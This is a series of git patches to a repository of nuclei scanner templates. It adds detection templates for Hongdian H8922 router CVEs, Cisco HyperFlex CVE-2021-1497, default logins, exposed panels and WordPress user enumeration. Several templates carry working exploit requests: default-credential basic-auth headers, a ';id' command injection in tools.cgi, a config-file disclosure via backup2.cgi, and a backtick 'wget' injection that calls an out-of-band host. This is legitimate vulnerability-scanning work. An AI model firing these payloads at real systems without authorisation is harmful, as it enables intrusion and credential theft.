CVE-2021-28150 + +info: + name: Hongdian Sensitive Information + author: gy741 + severity: medium + description: | + Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. + reference: | + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 + tags: cve,cve2021,hongdian,exposures + +requests: + - raw: + - | + GET /backup2.cgi HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + - | + GET /backup2.cgi HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic YWRtaW46YWRtaW4= + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/octet-stream" + part: header + + - type: word + words: + - "CLI configuration saved from vty" + - "service webadmin" + part: body diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml new file mode 100644 index 0000000000..9fad917567 --- /dev/null +++ b/cves/2021/CVE-2021-28151.yaml @@ -0,0 +1,67 @@ +id: CVE-2021-28151 + +info: + name: Hongdian Command Injection + author: gy741 + severity: high + description: | + Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. + reference: | + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 + tags: cve,cve2021,hongdian,rce + +requests: + - raw: + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Length: 85 + Cache-Control: max-age=0 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: http://{{Hostname}}/tools.cgi + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + op_type=ping&destination=%3Bid + + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Length: 85 + Cache-Control: max-age=0 + Authorization: Basic YWRtaW46YWRtaW4= + Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: http://{{Hostname}}/tools.cgi + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + op_type=ping&destination=%3Bid + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - "uid=" + - "gid=" + part: body diff --git a/default-logins/hongdian/hongdian-default-password.yaml b/default-logins/hongdian/hongdian-default-password.yaml new file mode 100644 index 0000000000..6558607526 --- /dev/null +++ b/default-logins/hongdian/hongdian-default-password.yaml @@ -0,0 +1,49 @@ +id: hongdian-default-password + +info: + name: Hongdian Default Credentials + author: gy741 + severity: high + tags: hongdian,default-login + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic YWRtaW46YWRtaW4= + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - "status_main.cgi" + part: body + + - type: status + status: + - 200 From 767f173f88509d3e15ab61931f11cb1f5cab43e5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 18:45:09 +0530 Subject: [PATCH 0403/4083] minor updates --- cves/2021/CVE-2021-28149.yaml | 2 +- cves/2021/CVE-2021-28150.yaml | 6 +++--- cves/2021/CVE-2021-28151.yaml | 5 +++-- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index 64a5b8369d..fe6e840041 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -7,7 +7,7 @@ info: description: | Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. reference: | - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 tags: cve,cve2021,hongdian,traversal diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index 0a2270e06d..245924ef14 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -7,7 +7,7 @@ info: description: | Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: | - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposures @@ -51,5 +51,5 @@ requests: - type: word words: - "CLI configuration saved from vty" - - "service webadmin" - part: body + - "service webadmin" + part: body \ No newline at end of file diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 9fad917567..82529e9e51 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -7,7 +7,7 @@ info: description: | Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. reference: | - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce @@ -63,5 +63,6 @@ requests: - type: word words: - "uid=" - - "gid=" + - "gid=" part: body + condition: and From c52e66670791fa9e2d07fd6e48ceb1ea4df411bd Mon Sep 17 00:00:00 2001 From: Frog Man <16836050+deFr0ggy@users.noreply.github.com> Date: Sat, 10 Jul 2021 19:05:54 +0500 Subject: [PATCH 0404/4083] Add files via upload --- exposed-panels/labtech-panel.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/labtech-panel.yaml diff --git a/exposed-panels/labtech-panel.yaml b/exposed-panels/labtech-panel.yaml new file mode 100644 index 0000000000..e0f68b38e3 --- /dev/null +++ b/exposed-panels/labtech-panel.yaml @@ -0,0 +1,30 @@ +id: LabTech Web Portal + +info: + name: LabTech Web Portal + author: deFr0ggy, @github.com/deFr0ggy + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/WCC2/" + redirects: true + max-redirects: 3 + matchers: + - type: word + words: + - "
  • LabTech
  • " + - '
    ' + - "

    Welcome to the LabTech Web Portal

    " + - "Universal Agent Uninstaller" + - "Technician Login" + - '' + part: body + condtion: and + + - type: word + words: + - "Welcome to the LabTech Web Portal" + part: header From 4133bf25e379c3846ab070f48111bb9acdd7f7c3 Mon Sep 17 00:00:00 2001 From: Frog Man <16836050+deFr0ggy@users.noreply.github.com> Date: Sat, 10 Jul 2021 19:46:05 +0500 Subject: [PATCH 0405/4083] Added the suggested changes. Added the suggested changes. --- exposed-panels/labtech-panel.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposed-panels/labtech-panel.yaml b/exposed-panels/labtech-panel.yaml index e0f68b38e3..71322976ef 100644 --- a/exposed-panels/labtech-panel.yaml +++ b/exposed-panels/labtech-panel.yaml @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}/WCC2/" redirects: true max-redirects: 3 + matchers-conditon: and matchers: - type: word words: @@ -24,7 +25,7 @@ requests: part: body condtion: and - - type: word - words: - - "Welcome to the LabTech Web Portal" - part: header + - type: status + status: + - 200 + From cc8337e878149d016ff3d9ee6ef8f2c70c57eda3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 10 Jul 2021 20:25:51 +0530 Subject: [PATCH 0406/4083] typos update --- exposed-panels/labtech-panel.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/exposed-panels/labtech-panel.yaml b/exposed-panels/labtech-panel.yaml index 71322976ef..56c81772a1 100644 --- a/exposed-panels/labtech-panel.yaml +++ b/exposed-panels/labtech-panel.yaml @@ -1,18 +1,19 @@ -id: LabTech Web Portal +id: labtech-panel info: name: LabTech Web Portal author: deFr0ggy, @github.com/deFr0ggy severity: info - tags: panel + tags: panel,labtech requests: - method: GET path: - "{{BaseURL}}/WCC2/" + redirects: true - max-redirects: 3 - matchers-conditon: and + max-redirects: 2 + matchers-condition: and matchers: - type: word words: @@ -23,9 +24,8 @@ requests: - "Technician Login" - '' part: body - condtion: and + condition: or - type: status status: - 200 - From 984338b657e86067e29b93c9c1c1ebfc9147b5c0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 14:58:30 +0000 Subject: [PATCH 0407/4083] Auto Update README [Sat Jul 10 14:58:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 95c1cb951d..e78744482e 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 213 | exposed-panels | 190 | +| cves | 383 | vulnerabilities | 213 | exposed-panels | 191 | | takeovers | 70 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1454 files**. +**126 directories, 1455 files**. From 1e8aa5288f6d9bf1e055fd6d6567ec8f6a79a107 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 20:45:00 +0530 Subject: [PATCH 0408/4083] Update CVE-2021-1497.yaml --- cves/2021/CVE-2021-1497.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index a177944838..03c155564c 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -1,5 +1,5 @@ id: CVE-2021-1497 - + info: name: Cisco HyperFlex HX Data Platform RCE author: gy741 @@ -11,7 +11,7 @@ info: - https://twitter.com/cycatz2/status/1394615546935529472 - https://twitter.com/Unit42_Intel/status/1402655493735206915 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - tags: cisco,rce,oob + tags: cve,cve2021,cisco,rce,oob requests: - raw: From dd9e85a29c7ee4d82a9aa7df2a25d89602711dff Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 20:47:20 +0530 Subject: [PATCH 0409/4083] Added missing condition --- cves/2021/CVE-2021-1497.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 03c155564c..c1b327db71 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -25,6 +25,7 @@ requests: action=&token=`nslookup {{interactsh-url}}`&mode=`nslookup {{interactsh-url}}` + matchers-condition: and matchers: - type: status status: From 7f37050361299ed7ebd4789fe75d3a9c269e7c85 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 20:53:23 +0530 Subject: [PATCH 0410/4083] Added HTTP check --- cves/2021/CVE-2021-1497.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index c1b327db71..92e2b84410 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -2,6 +2,7 @@ id: CVE-2021-1497 info: name: Cisco HyperFlex HX Data Platform RCE + description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 severity: critical reference: | @@ -11,6 +12,7 @@ info: - https://twitter.com/cycatz2/status/1394615546935529472 - https://twitter.com/Unit42_Intel/status/1402655493735206915 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution + - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md tags: cve,cve2021,cisco,rce,oob requests: @@ -23,7 +25,7 @@ requests: Content-Length: 78 Content-Type: application/x-www-form-urlencoded - action=&token=`nslookup {{interactsh-url}}`&mode=`nslookup {{interactsh-url}}` + action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` matchers-condition: and matchers: @@ -32,6 +34,6 @@ requests: - 200 - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" + - "http" From 1cd29628aa54361aaeb88b75a6d2beafe163c5e6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 20:54:04 +0530 Subject: [PATCH 0411/4083] more reference --- cves/2021/CVE-2021-1497.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 92e2b84410..905a7a7455 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -11,6 +11,7 @@ info: - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html - https://twitter.com/cycatz2/status/1394615546935529472 - https://twitter.com/Unit42_Intel/status/1402655493735206915 + - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md tags: cve,cve2021,cisco,rce,oob From 67c60b057ee3a1209ebeccbb263d228419a12daf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 15:25:30 +0000 Subject: [PATCH 0412/4083] Auto Update README [Sat Jul 10 15:25:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e78744482e..0117864f1a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 213 | exposed-panels | 191 | +| cves | 384 | vulnerabilities | 213 | exposed-panels | 191 | | takeovers | 70 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1455 files**. +**126 directories, 1456 files**. From 4874ca4dcdb897d39fe46047057681fce7f9662c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 15:55:14 +0000 Subject: [PATCH 0413/4083] Auto Update README [Sat Jul 10 15:55:14 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 0117864f1a..930b36e758 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 384 | vulnerabilities | 213 | exposed-panels | 191 | +| cves | 387 | vulnerabilities | 213 | exposed-panels | 191 | | takeovers | 70 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | -| default-logins | 36 | file | 42 | dns | 10 | +| default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1456 files**. +**127 directories, 1460 files**. From 7a1ac536d0c4eca0b6d5df4a072b221c2389084a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 21:48:38 +0530 Subject: [PATCH 0414/4083] Additional matchers --- technologies/oauth2-detect.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/technologies/oauth2-detect.yaml b/technologies/oauth2-detect.yaml index 639724d4e8..53cc1456fe 100644 --- a/technologies/oauth2-detect.yaml +++ b/technologies/oauth2-detect.yaml @@ -11,9 +11,18 @@ requests: - method: POST path: - "{{BaseURL}}/oauth/token" + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + matchers-condition: and matchers: - type: status status: - 401 + - 400 + condition: or + + - type: word + part: body + words: + - 'error":"invalid_client"' \ No newline at end of file From 61950594977c84d59b52a779e02f46b51e62b770 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 16:20:34 +0000 Subject: [PATCH 0415/4083] Auto Update README [Sat Jul 10 16:20:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 930b36e758..0ad52f7c90 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 387 | vulnerabilities | 213 | exposed-panels | 191 | -| takeovers | 70 | exposures | 112 | technologies | 113 | +| takeovers | 70 | exposures | 112 | technologies | 114 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1460 files**. +**127 directories, 1461 files**. From b228b35f8327cec8d48136d5c3bb0a68328d192e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 21:54:31 +0530 Subject: [PATCH 0416/4083] Added wordpress-user-enum --- .../wordpress/wordpress-user-enum.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-user-enum.yaml diff --git a/vulnerabilities/wordpress/wordpress-user-enum.yaml b/vulnerabilities/wordpress/wordpress-user-enum.yaml new file mode 100644 index 0000000000..e938ce3114 --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-user-enum.yaml @@ -0,0 +1,28 @@ +id: wordpress-user-enum + +info: + name: Wordpress User Enumeration + author: r3dg33k + severity: info + tags: wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1" + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' + part: header + - type: status + status: + - 301 + + extractors: + - type: regex + part: header + regex: + - 'author\/\w+' From 95ba356fdfa72eecc8edb6ee6eb75f607be75498 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 16:26:32 +0000 Subject: [PATCH 0417/4083] Auto Update README [Sat Jul 10 16:26:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0ad52f7c90..cba20d53e0 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 387 | vulnerabilities | 213 | exposed-panels | 191 | +| cves | 387 | vulnerabilities | 214 | exposed-panels | 191 | | takeovers | 70 | exposures | 112 | technologies | 114 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1461 files**. +**127 directories, 1462 files**. From 9c0e218365e09c277fc874068d2b4131e657ccca Mon Sep 17 00:00:00 2001 From: Ali Fathi Ali Sawehli <55149010+alifathi-h1@users.noreply.github.com> Date: Sun, 11 Jul 2021 00:31:09 +0800 Subject: [PATCH 0418/4083] Added Herokuapp Detection --- technologies/herokuapp-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/herokuapp-detect.yaml diff --git a/technologies/herokuapp-detect.yaml b/technologies/herokuapp-detect.yaml new file mode 100644 index 0000000000..edebaee70a --- /dev/null +++ b/technologies/herokuapp-detect.yaml @@ -0,0 +1,19 @@ +id: herokuapp-detect + +info: + name: Detect websites using Herokuapp endpoints + author: alifathi-h1 + severity: info + tags: heroku,tech + description: Detected endpoints might be vulnerable to subdomain takeover or disclose sensitive info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "[a-z0-9.-]+\\.herokuapp\\.com" From 525fd7f8dfc92d439342f556ae9cd7b861fdaef2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 22:04:20 +0530 Subject: [PATCH 0419/4083] Added codemeter-webadmin-panel --- exposed-panels/codemeter-webadmin-panel.yaml | 25 ++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/codemeter-webadmin-panel.yaml diff --git a/exposed-panels/codemeter-webadmin-panel.yaml b/exposed-panels/codemeter-webadmin-panel.yaml new file mode 100644 index 0000000000..bcb121e897 --- /dev/null +++ b/exposed-panels/codemeter-webadmin-panel.yaml @@ -0,0 +1,25 @@ +id: codemeter-webadmin-panel + +info: + name: CodeMeter WebAdmin Panel + author: Techryptic (@Tech) + severity: high + description: Panel on CodeMeter WebAdmin application. + tags: codemeter,webadmin,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: CmWebAdminSession" + part: header + + - type: status + status: + - 301 + - 302 From 7c15a743b8a9428340308c08a74ced4f082cc77f Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 22:06:59 +0530 Subject: [PATCH 0420/4083] typos --- PULL_REQUEST_TEMPLATE.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md index 053b299177..e2ad854090 100644 --- a/PULL_REQUEST_TEMPLATE.md +++ b/PULL_REQUEST_TEMPLATE.md @@ -13,7 +13,7 @@ I've validated this template locally? - [ ] NO -#### Additonal Details (leave it blank if not applicalbe) +#### Additional Details (leave it blank if not applicable) From 60a83e5792f1b2722716afe19093e1d2b81da73b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 16:40:27 +0000 Subject: [PATCH 0421/4083] Auto Update README [Sat Jul 10 16:40:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cba20d53e0..837aae3788 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 387 | vulnerabilities | 214 | exposed-panels | 191 | +| cves | 387 | vulnerabilities | 214 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 114 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1462 files**. +**127 directories, 1463 files**. From f489d31e2db2840ca309991e049f190e29a9ea74 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 22:22:27 +0530 Subject: [PATCH 0422/4083] Update herokuapp-detect.yaml --- technologies/herokuapp-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/herokuapp-detect.yaml b/technologies/herokuapp-detect.yaml index edebaee70a..66941b4a2c 100644 --- a/technologies/herokuapp-detect.yaml +++ b/technologies/herokuapp-detect.yaml @@ -1,7 +1,7 @@ -id: herokuapp-detect +id: herokuapp-detect info: - name: Detect websites using Herokuapp endpoints + name: Detect websites using Herokuapp endpoints author: alifathi-h1 severity: info tags: heroku,tech From e44370be2f7c1ba49d31b5574c8fb1792a43422e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 16:53:15 +0000 Subject: [PATCH 0423/4083] Auto Update README [Sat Jul 10 16:53:15 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 837aae3788..7f3c7857aa 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 387 | vulnerabilities | 214 | exposed-panels | 192 | -| takeovers | 70 | exposures | 112 | technologies | 114 | +| takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1463 files**. +**127 directories, 1464 files**. From 01ae482fe8b9aaec22cf53531aa20a4c9d972588 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 22:31:08 +0530 Subject: [PATCH 0424/4083] Added CVE-2021-34621 --- cves/2021/CVE-2021-34621.yaml | 106 ++++++++++++++++++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 cves/2021/CVE-2021-34621.yaml diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml new file mode 100644 index 0000000000..0c9e8e6232 --- /dev/null +++ b/cves/2021/CVE-2021-34621.yaml @@ -0,0 +1,106 @@ +id: CVE-2021-34621 + +info: + name: WordPress ProfilePress wp-user-avatar plugin make admin users + author: 0xsapra + severity: critical + 